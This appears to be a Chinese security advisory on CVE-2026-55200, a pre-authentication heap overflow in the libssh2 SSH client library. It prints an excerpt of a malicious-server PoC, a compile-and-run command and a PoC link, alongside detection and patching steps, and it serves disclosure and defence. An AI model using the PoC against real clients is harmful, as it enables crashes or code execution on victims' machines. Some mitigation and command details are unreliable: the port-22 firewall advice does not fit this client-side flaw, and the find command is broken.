CVE-2026-55200：libssh2预认证RCE漏洞，CVSS 9.2，PoC已公开

导语：The Hacker News于2026年6月29日报道：开源SSH库libssh2存在一项严重内存损坏漏洞CVE-2026-55200，CVSS评分高达9.2。攻击者只需部署一个恶意SSH服务器，当受害者SSH客户端连接时，即可触发客户端libssh2的堆外写（Heap Out-of-Bounds Write），无需任何认证和用户交互即可实现远程代码执行。PoC已公开在github.com/xd20111/CVE-2026-55200，真实影响面远超libssh2本身——curl、Git、PHP等大量主流项目均静态链接了该库。

一、漏洞概述

字段	详情
CVE	CVE-2026-55200
严重等级	9.2 Critical
漏洞类型	Out-of-Bounds Write（堆外写）
组件	libssh2
影响版本	≤ 1.11.1
攻击向量	Network（网络）
权限要求	无需认证
用户交互	无需交互
利用复杂度	Low（低）
修复版本	Commit `97acf3dfda80c91c3a8c9f2372546301d4a1a7a8`

二、漏洞原理

问题出在libssh2的SSH传输层数据包处理函数ssh2_transport_read()中——它没有正确验证incoming packet的packet_length字段，直接用于堆内存分配：

packet_length = read_packet_length();
buffer = malloc(packet_length);
memcpy(buffer, incoming_data, packet_length);

攻击者只需构造一个packet_length为超大值的恶意SSH数据包（PoC中使用0xFFFFFFFF，即约4GB），libssh2会尝试分配一个巨大的堆内存块，随后将大量数据复制进去，导致堆损坏。

关键点：由于漏洞在SSH传输层握手阶段触发，认证之前就能触发，极大提升了危害程度。

漏洞利用流程

攻击者
    │
    ▼
部署恶意SSH服务器（默认端口1337）
    │
    ▼
受害者SSH客户端连接（如libcurl、Git）
    │
    ▼
服务器发送SSH横幅 + 伪造SSH_MSG_KEXINIT
    │
    ▼
客户端处理KEXINIT，接收恶意数据包
    │
    ▼
malloc(packet_length = 0xFFFFFFFF) → 堆损坏
    │
 ┌──┴──┐
 ▼     ▼
DoS   潜在RCE

三、波及范围：真正的噩梦在供应链

libssh2被大量主流项目静态链接——curl、Git、PHP，以及各类网络设备和IoT产品。这意味着漏洞的真实影响面远超libssh2本身：

备份软件
文件传输应用
SSH客户端
自动化框架
CI/CD平台
基础设施编排工具
网络设备固件
Linux嵌入式系统
IoT设备

⚠️ OpenSSH本身不受影响，因为OpenSSH内部不使用libssh2。

四、PoC分析

github.com/xd20111/CVE-2026-55200公开的PoC是一个恶意SSH服务器（C语言），工作流程：

#define SSH_BANNER "SSH-Research / Educational use ONLYrn"
#define MALICIOUS_PACKET_LENGTH 0xFFFFFFFFU

// 1. 发送SSH横幅
send(client_sock, SSH_BANNER, strlen(SSH_BANNER), 0);

// 2. 接收客户端banner
recv(client_sock, buffer, sizeof(buffer)-1, 0);

// 3. 发送伪造的SSH_MSG_KEXINIT
unsigned char kexinit[] = { 0x00, 0x00, 0x00, 0x10, 0x14, ... };
send(client_sock, kexinit, sizeof(kexinit), 0);

// 4. 发送恶意数据包
unsigned char malicious[1024] = {0};
uint32_t pkt_len = MALICIOUS_PACKET_LENGTH;  // 0xFFFFFFFF = 4GB
unsigned char pad_len = 8;

memcpy(malicious, &pkt_len, 4);           // 前4字节 = 超大长度值
malicious[4] = pad_len;
memset(malicious + 5, 0x41, 700);         // 填充700字节 'A'

size_t total = 5 + 700 + pad_len;
send(client_sock, malicious, total, 0);

编译运行：gcc CVE-2026-55200.c -o exploit -lpthread && ./exploit [port]

五、检测方法

# 检查libssh2版本
pkg-config --modversion libssh2

# Debian/Ubuntu
dpkg -l | grep libssh2
apt-cache policy libssh2-1

# RHEL/AlmaLinux
rpm -qa | grep libssh2
dnf info libssh2

# 查找依赖libssh2的可执行文件
ldconfig -p | grep libssh2
find /usr -type f -executable -exec ldd {} ; 2>/dev/null | grep libssh2

# 检查curl是否受影响（静态链接libssh2）
curl --version | grep libssh2

六、修复方案

方案一（推荐）：立即升级

# Debian/Ubuntu
sudo apt update && sudo apt upgrade libssh2-1 && sudo reboot

# RHEL/AlmaLinux
sudo dnf update libssh2 && sudo reboot

# Fedora
sudo dnf upgrade --refresh libssh2 && sudo reboot

方案二：临时限制SSH暴露

# 限制只有可信IP才能连接22端口
sudo ufw allow from TRUSTED_IP to any port 22
sudo ufw deny 22

方案三：编译器加固

编译应用时启用以下安全选项：

-fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie -Wl,-z,relro,-z,now

七、相关链接

PoC下载：https://github.com/xd20111/CVE-2026-55200
NVD详情：https://nvd.nist.gov/vuln/detail/CVE-2026-55200
libssh2官方：https://libssh2.org
修复提交：https://github.com/libssh2/libssh2/commit/97acf3dfda80c91c3a8c9f2372546301d4a1a7a8

文章版权归作者所有，未经允许请勿转载。

THE END